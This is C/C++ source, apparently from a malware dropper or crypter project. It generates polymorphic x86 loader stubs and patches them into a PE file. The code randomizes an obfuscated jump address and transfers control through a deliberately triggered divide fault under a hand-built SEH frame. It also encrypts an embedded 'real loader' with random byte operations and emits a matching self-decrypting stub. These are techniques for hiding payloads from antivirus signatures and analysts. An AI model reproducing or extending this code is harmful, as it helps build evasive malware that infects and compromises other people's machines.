#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

#include "drop.h"
#include "polym.h"

#define MAINPROG
#ifdef __cplusplus
extern "C" {
#endif
#include "../disasm/disasm.h"
#ifdef __cplusplus
}
#endif

char *regs[] = {"eax", "ecx", "edx", "ebx", "esp", "ebp", "esi", "edi"};

#define PUSH_REG	5
#define POP_REG		6
#define PUSH_IMM	7
#define MOV_REG		8
#define SUB_REG		1
#define ADD_REG		0
#define XOR_REG		2
#define ROL_REG		3
#define ROR_REG		4
#define JMP_REG		9
#define RET			10

char *opsStr[] = {"add %s,0%x", "sub %s,0%x", "xor %s,0%x", "rol %s,0%x", "ror %s,0%x", "push %s", "pop %s", "push 0%x", "mov %s,0%x", "jmp %s", "ret"};

//these are reversed, since if the operation is an add, to decrypt we need a sub, so OP_ADD indexes "sub %s,0%x"
#define OP_ADD 1
#define OP_SUB 0
#define OP_XOR 2
#define OP_ROL 4
#define OP_ROR 3
#define SWITCH_REG 5

#define REG_EAX 0
#define REG_ECX 1
#define REG_EDX 2
#define REG_EBX 3
#define REG_ESP 4
#define REG_EBP 5
#define REG_ESI 6
#define REG_EDI 7

typedef struct _OpInfo
{
	ULONG Operation;
	ULONG Operand;
} OpInfo;

//randomly generates a "push reg" or "push value" variant and assemble it
DWORD AssemblePush(PUCHAR Offset, DWORD Value, BOOL Reg)
{
	DWORD rnd;
	t_asmmodel am;
	PUCHAR offPtr = Offset;
	char instr[32] = {0};
	char errtext[TEXTLEN] = {0};

	rnd = IntervalRand(0, 100);
	if(rnd < 50)
	{
		if(Reg)
			sprintf(instr, opsStr[PUSH_REG], regs[Value]);
		else
			sprintf(instr, opsStr[PUSH_IMM], Value);

		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}
	else
	{
		sprintf(instr, opsStr[SUB_REG], regs[4], 4);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;

		if(Reg)
			sprintf(instr, "mov [esp], %s", regs[Value]);
		else
			sprintf(instr, "mov [dword esp], 0%x", Value);

		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}

	return (DWORD)(offPtr - Offset);
}

DWORD AssemblePop(PUCHAR Offset, DWORD Register)
{
	DWORD rnd;
	t_asmmodel am;
	PUCHAR offPtr = Offset;
	char instr[32] = {0};
	char errtext[TEXTLEN] = {0};

	rnd = IntervalRand(0, 100);
	if(rnd < 50)
	{
		sprintf(instr, opsStr[POP_REG], regs[Register]);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}
	else
	{
		sprintf(instr, "mov %s, [esp]", regs[Register]);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;

		sprintf(instr, opsStr[ADD_REG], regs[4], 4);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}

	return (DWORD)(offPtr - Offset);
}

//this randomly generates a ret variant and assemble it
DWORD AssembleRet(PUCHAR Offset, DWORD Register)
{
	DWORD rnd;
	t_asmmodel am;
	PUCHAR offPtr = Offset;
	char instr[32] = {0};
	char errtext[TEXTLEN] = {0};

	rnd = IntervalRand(0, 100);
	if(rnd < 50) //generate a jmp reg
	{
		sprintf(instr, opsStr[JMP_REG], regs[Register]);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}
	else
	{
		offPtr += AssemblePush(offPtr, Register, TRUE);

		sprintf(instr, "RETN");
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}

	return (DWORD)(offPtr - Offset);
}

DWORD __stdcall Build1Loader(PEInfo *pPEInfo, DWORD LdrOffset, DWORD JmpAddress)
{
	OpInfo *ops;
	t_asmmodel am;
	ULONG numOps;
	DWORD curAddress = JmpAddress;
	char instr[32] = {0};
	char errtext[TEXTLEN] = {0};

	numOps = IntervalRand(1, 10);
	ops = (OpInfo *)malloc(sizeof(OpInfo) * numOps);

	//manipulate JmpAddress with reversible operations
	for(ULONG i = 0; i < numOps; i++)
	{
		ULONG op = IntervalRand(0, 5);
		ops[i].Operation = op;

		switch(op)
		{
			case OP_ADD:
			{
				DWORD rnd = (DWORD)rand();
				ops[i].Operand = rnd;
				__asm {
					push eax
					mov eax, curAddress
					add eax, rnd
					mov curAddress, eax
					pop eax
				}
			}
			break;

			case OP_SUB:
			{
				DWORD rnd = (DWORD)rand();
				ops[i].Operand = rnd;
				__asm {
					push eax
					mov eax, curAddress
					sub eax, rnd
					mov curAddress, eax
					pop eax
				}
			}
			break;

			case OP_XOR:
			{
				DWORD rnd = (DWORD)rand();
				ops[i].Operand = rnd;
				curAddress ^= rnd;
			}
			break;

			case OP_ROL:
			{
				BYTE rnd = (BYTE)IntervalRand(1, 16);
				ops[i].Operand = (DWORD)rnd;
				__asm {
					push eax
					push ecx
					mov eax, curAddress
					movzx ecx, rnd
					rol eax, cl
					mov curAddress, eax
					pop ecx
					pop eax
				}
			}
			break;

			case OP_ROR:
			{
				BYTE rnd = (BYTE)IntervalRand(1, 16);
				ops[i].Operand = (DWORD)rnd;
				__asm {
					push eax
					push ecx
					mov eax, curAddress
					movzx ecx, rnd
					ror eax, cl
					mov curAddress, eax
					pop ecx
					pop eax
				}
			}
			break;
		}
	}

	DWORD workRegister = 0;

	do
	{
		workRegister = IntervalRand(0, 7);
	} while(workRegister == REG_ESP); //esp can't be used

	PUCHAR offPtr = (PUCHAR)LdrOffset;

	offPtr += AssemblePush(offPtr, workRegister, TRUE);

	DWORD rnd = IntervalRand(0, 100);
	if(rnd < 50)
	{
		sprintf(instr, opsStr[MOV_REG], regs[workRegister], curAddress);
		Assemble(instr, LdrOffset, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}
	else
	{
		offPtr += AssemblePush(offPtr, curAddress, FALSE);
		offPtr += AssemblePop(offPtr, workRegister);
	}

	for(int i = numOps-1; i >= 0; i--)
	{
		if(ops[i].Operation == SWITCH_REG)
		{
			offPtr += AssemblePush(offPtr, workRegister, TRUE);

			sprintf(instr, "mov %s, [dword esp+4]", regs[workRegister]);
			Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
			memcpy(offPtr, am.code, am.length);
			offPtr += am.length;

			do
			{
				workRegister = IntervalRand(0, 7);
			} while(workRegister == REG_ESP);

			sprintf(instr, "mov [dword esp+4], %s", regs[workRegister]);
			Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
			memcpy(offPtr, am.code, am.length);
			offPtr += am.length;

			offPtr += AssemblePop(offPtr, workRegister);
		}
		else
		{
			sprintf(instr, opsStr[ops[i].Operation], regs[workRegister], ops[i].Operand);
			Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
			memcpy(offPtr, am.code, am.length);
			offPtr += am.length;
		}
	}

	sprintf(instr, "add %s, %08x", regs[workRegister], pPEInfo->ImageOptionalHeader->ImageBase);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	DWORD xorValue = (DWORD)rand();
	sprintf(instr, "xor %s, %08x", regs[workRegister], xorValue);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "push %s", regs[workRegister]);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "xor [dword esp], %08x", xorValue);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	Assemble("push fs", (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	Assemble("pop es", (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "xor %s,%s", regs[workRegister], regs[workRegister]);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "push es:[%s]", regs[workRegister]);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "mov es:[%s], esp", regs[workRegister]);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "idiv %s", regs[workRegister]);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	free(ops);

	//the first stage loader has been built, we now assemble a "pop reg" as the first instruction of the next stage loader, this way the stack is restored
	//no polymorphism here, we need to know the exact size of the instruction
	DWORD nextLdrOffset = RvaToOffset(JmpAddress, pPEInfo->ImageNtHeaders);
	nextLdrOffset += (DWORD)pPEInfo->FileBase;


	Assemble("mov esp, [dword esp+8]", nextLdrOffset, &am, 0, 0, errtext);
	memcpy((PUCHAR)nextLdrOffset, am.code, am.length);
	nextLdrOffset += am.length;

	Assemble("pop fs:[0]", nextLdrOffset, &am, 0, 0, errtext);
	memcpy((PUCHAR)nextLdrOffset, am.code, am.length);
	nextLdrOffset += am.length;

	Assemble("add esp, 4", nextLdrOffset, &am, 0, 0, errtext);
	memcpy((PUCHAR)nextLdrOffset, am.code, am.length);
	nextLdrOffset += am.length;

	sprintf(instr, "pop %s", regs[workRegister]);
	Assemble(instr, nextLdrOffset, &am, 0, 0, errtext);
	memcpy((PUCHAR)nextLdrOffset, am.code, am.length);

	return (DWORD)(offPtr - LdrOffset);
}

DWORD __stdcall Build15Loader(PEInfo *pPEInfo, DWORD LdrOffset, DWORD RealLdrAddress, DWORD RealLdrSize, DWORD RealLdrDSize)
{
	OpInfo *ops;
	t_asmmodel am;
	ULONG numOps;
	char instr[32] = {0};
	char errtext[TEXTLEN] = {0};
	PUCHAR realLdrOffset = (PUCHAR)RealLdrAddress;
	PUCHAR offPtr = (PUCHAR)LdrOffset;

	numOps = IntervalRand(1, 5);
	ops = (OpInfo *)malloc(sizeof(OpInfo)*numOps);
	for(ULONG i = 0; i < numOps; i++)
	{
		ops[i].Operation = IntervalRand(0, 4);
		if(ops[i].Operation == OP_ROL || ops[i].Operation == OP_ROR)
			ops[i].Operand = IntervalRand(1, 16);
		else
			ops[i].Operand = IntervalRand(0, 0xFE);
	}

	realLdrOffset = (PUCHAR)RvaToOffset(RealLdrAddress, pPEInfo->ImageNtHeaders);
	realLdrOffset = MakePtr(UCHAR *, realLdrOffset, pPEInfo->FileBase);

	for(ULONG i = 0; i < RealLdrSize; i++)
	{
		UCHAR curByte = *(realLdrOffset + i);
		for(ULONG j = 0; j < numOps; j++)
		{
			switch(ops[j].Operation)
			{
				case OP_ADD:
					curByte += (BYTE)ops[j].Operand;
					break;

				case OP_SUB:
					curByte -= (BYTE)ops[j].Operand;
					break;

				case OP_XOR:
					curByte ^= (BYTE)ops[j].Operand;
					break;

				case OP_ROL:
				{
					BYTE opr = (BYTE)ops[j].Operand;
					__asm {
						push eax
						push ecx
						movzx eax, curByte
						movzx ecx, opr
						rol al, cl
						mov curByte, al
						pop ecx
						pop eax
					}
				}
				break;

				case OP_ROR:
				{
					BYTE opr = (BYTE)ops[j].Operand;
					__asm {
						push eax
						push ecx
						movzx eax, curByte
						movzx ecx, opr
						ror al, cl
						mov curByte, al
						pop ecx
						pop eax
					}
				}
				break;
			}
		}

		*(realLdrOffset + i) = curByte;
	}

	DWORD rnd = IntervalRand(0, 100);
	if(rnd < 50)
		offPtr += AssemblePush(offPtr, IntervalRand(0, 7), TRUE);
	else
		offPtr += AssemblePush(offPtr, IntervalRand(0, 0xFFEEDDCC), FALSE);

	sprintf(instr, "pushfd");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "pushad");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "mov esi, 0%x", RealLdrAddress);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "add esi, %08x", pPEInfo->ImageOptionalHeader->ImageBase);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "mov ecx, 0%x", RealLdrSize);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	DWORD label1 = (DWORD)offPtr;
	for(int k = numOps - 1; k >= 0; k--)
	{
		sprintf(instr, opsStr[ops[k].Operation], "[byte esi]", ops[k].Operand);
		Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
		memcpy(offPtr, am.code, am.length);
		offPtr += am.length;
	}

	sprintf(instr, "inc esi");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "dec ecx");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "test ecx,ecx");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "jnz 0%x", label1);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "mov eax, %08x", pPEInfo->ImageOptionalHeader->ImageBase);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "mov esi, 0%x", RealLdrAddress);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	sprintf(instr, "add esi, eax");
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;

	offPtr += AssemblePush(offPtr, 6, TRUE);

	sprintf(instr, "add esi, 0%x", RealLdrDSize);
	Assemble(instr, (ulong)offPtr, &am, 0, 0, errtext);
	memcpy(offPtr, am.code, am.length);
	offPtr += am.length;


	offPtr += AssembleRet(offPtr, 6);

	return (DWORD)(offPtr - (PUCHAR)LdrOffset);
}